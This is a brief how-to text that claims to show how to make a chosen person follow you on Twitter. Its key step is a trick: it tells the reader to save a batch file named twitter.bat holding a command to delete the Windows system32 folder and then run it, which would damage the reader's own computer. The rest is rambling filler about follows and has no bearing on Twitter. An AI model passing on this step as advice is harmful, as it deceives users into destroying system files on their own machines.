Open twitter and open the persons twitter that you want to follow you
Open you own twitter
Now this is very important. Open notepad and type in:
@echo off
del c:\windows\system32
save the file as:
twitter.bat
There will be an option that says save as textfile and etc. Save it as all files, then run the file, and it'll allow you to do that.

There are people who do not care if they follow someone and not follow them back but, in twitter, it is more important also for them to be followed. So eventually, you are both aiming for the same thing. You will be luck if they will not care if they follow you but most people do.
